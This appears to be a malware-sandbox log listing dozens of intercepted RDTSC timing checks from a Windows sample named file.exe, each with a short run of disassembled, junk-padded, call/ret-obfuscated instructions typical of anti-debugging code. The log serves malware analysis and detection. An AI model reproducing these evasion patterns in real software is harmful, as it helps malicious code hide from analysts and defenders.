Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110F4EE second address: 110F562 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD648BC9ACDh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FD648BC9AC8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov ebx, 4E4DC45Dh 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007FD648BC9AC8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FD648BC9AD2h 0x00000052 push edx 0x00000053 pop edx 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110E86C second address: 110E876 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD648C0B44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1110528 second address: 1110542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1110542 second address: 1110561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f mov bx, 2AC4h 0x00000013 push 00000000h 0x00000015 mov edi, ebx 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1110561 second address: 1110566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11114B6 second address: 11114BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11114BA second address: 11114CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FD648BC9AC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11114CC second address: 11114D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11114D2 second address: 11114DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD648BC9AC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111242F second address: 1112433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11124D5 second address: 11124DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11124DD second address: 11124F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD648C0B446h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11124F0 second address: 11124F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11106B6 second address: 11106BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11106BA second address: 11106CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11106CB second address: 11106D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11106D1 second address: 11106D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110F65F second address: 110F710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B450h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD648C0B44Dh 0x0000000e popad 0x0000000f nop 0x00000010 jp 00007FD648C0B448h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007FD648C0B44Eh 0x00000022 pop ebx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a mov eax, dword ptr [ebp+122D0B55h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FD648C0B448h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a xor ebx, dword ptr [ebp+122D3A72h] 0x00000050 sbb ebx, 05896559h 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ebp 0x0000005b call 00007FD648C0B448h 0x00000060 pop ebp 0x00000061 mov dword ptr [esp+04h], ebp 0x00000065 add dword ptr [esp+04h], 00000014h 0x0000006d inc ebp 0x0000006e push ebp 0x0000006f ret 0x00000070 pop ebp 0x00000071 ret 0x00000072 jmp 00007FD648C0B455h 0x00000077 nop 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110F710 second address: 110F725 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FD648BC9AC6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111344D second address: 1113452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111165B second address: 1111661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11125E5 second address: 11125EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11125EB second address: 1112608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD648BC9AC6h 0x00000009 jmp 00007FD648BC9ACBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112608 second address: 111260E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111260E second address: 1112613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112613 second address: 1112619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112619 second address: 111261D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11143B3 second address: 11143B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111261D second address: 11126AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FD648BC9AC8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FD648BC9AC8h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 jmp 00007FD648BC9ACBh 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 add bx, 81E1h 0x00000055 mov eax, dword ptr [ebp+122D0105h] 0x0000005b mov edi, dword ptr [ebp+122D3796h] 0x00000061 push FFFFFFFFh 0x00000063 mov bl, A5h 0x00000065 nop 0x00000066 pushad 0x00000067 jbe 00007FD648BC9AC8h 0x0000006d pushad 0x0000006e popad 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007FD648BC9ACAh 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11143B8 second address: 111441A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jne 00007FD648C0B448h 0x00000011 pop ebx 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D2CE3h], ecx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FD648C0B448h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 sub bl, 00000034h 0x00000038 push 00000000h 0x0000003a jmp 00007FD648C0B452h 0x0000003f mov bl, 87h 0x00000041 push eax 0x00000042 je 00007FD648C0B454h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11126AE second address: 11126D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD648BC9AD8h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FD648BC9AC6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11126D7 second address: 11126DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11153CA second address: 11153EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD648BC9AD2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD648BC9AC6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11153EB second address: 1115401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B452h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114543 second address: 1114548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11165BB second address: 11165BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1119623 second address: 111963C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BBEC second address: 111BBF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BBF0 second address: 111BBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BBFA second address: 111BC27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD648C0B44Bh 0x0000000d jmp 00007FD648C0B450h 0x00000012 popad 0x00000013 pushad 0x00000014 js 00007FD648C0B44Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BC27 second address: 111BC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BC2F second address: 111BC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD648C0B446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BC39 second address: 111BC3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112259D second address: 11225A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11225A3 second address: 11225A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112286A second address: 1122870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1122870 second address: 1122879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1122879 second address: 112287D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112287D second address: 112288E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FD648BC9AD0h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1129636 second address: 1129640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD648C0B446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1129640 second address: 1129644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1129878 second address: 112987C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1129946 second address: F3EB58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a add dword ptr [esp], 1EA69571h 0x00000011 je 00007FD648BC9AD4h 0x00000017 pushad 0x00000018 jne 00007FD648BC9AC6h 0x0000001e je 00007FD648BC9AC6h 0x00000024 popad 0x00000025 push dword ptr [ebp+122D0F61h] 0x0000002b clc 0x0000002c call dword ptr [ebp+122D3545h] 0x00000032 pushad 0x00000033 sub dword ptr [ebp+122D2EEEh], edx 0x00000039 xor eax, eax 0x0000003b mov dword ptr [ebp+122D2EEEh], ecx 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 jmp 00007FD648BC9ACDh 0x0000004a mov dword ptr [ebp+122D3A0Ah], eax 0x00000050 pushad 0x00000051 push ebx 0x00000052 mov dword ptr [ebp+122D1FC2h], ebx 0x00000058 pop esi 0x00000059 add cx, 57BEh 0x0000005e popad 0x0000005f mov esi, 0000003Ch 0x00000064 add dword ptr [ebp+122D2EEEh], ecx 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e add dword ptr [ebp+122D1FC2h], ebx 0x00000074 lodsw 0x00000076 pushad 0x00000077 or bh, FFFFFFF0h 0x0000007a popad 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f jl 00007FD648BC9AD8h 0x00000085 jmp 00007FD648BC9AD2h 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e jnc 00007FD648BC9AE6h 0x00000094 nop 0x00000095 push eax 0x00000096 push eax 0x00000097 push edx 0x00000098 pushad 0x00000099 popad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FC01 second address: 112FC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B453h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FDA3 second address: 112FDB0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FDB0 second address: 112FDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD648C0B446h 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FD648C0B454h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130095 second address: 1130099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130510 second address: 1130514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1135E21 second address: 1135E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1135E25 second address: 1135E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1135E29 second address: 1135E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FD648BC9AD2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11352C4 second address: 11352CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11352CB second address: 11352E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD3h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11352E3 second address: 1135304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FD648C0B459h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1134934 second address: 1134939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1134939 second address: 113493F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113493F second address: 1134943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1134943 second address: 1134947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1100967 second address: 1100970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1135729 second address: 1135749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD648C0B459h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1135749 second address: 1135752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1135B1B second address: 1135B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BF33C second address: 10BF342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113EFFA second address: 113F000 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113DEF4 second address: 113DEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113DEFA second address: 113DEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113DEFE second address: 113DF0E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD648BC9AC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113DF0E second address: 113DF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113DF14 second address: 113DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD648BC9AC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FD648BC9AC6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113DF3C second address: 113DF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1103EE8 second address: 10DF026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov ecx, dword ptr [ebp+12488708h] 0x0000000e call dword ptr [ebp+122D2C30h] 0x00000014 je 00007FD648BC9ADEh 0x0000001a jc 00007FD648BC9ACAh 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jbe 00007FD648BC9AC6h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1103FF8 second address: 1104011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FD648C0B44Ch 0x0000000b jne 00007FD648C0B446h 0x00000011 popad 0x00000012 push eax 0x00000013 push esi 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11046F5 second address: 11046FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11046FB second address: 110473E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD648C0B450h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FD648C0B448h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 nop 0x00000029 push ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110473E second address: 1104742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104742 second address: 1104746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
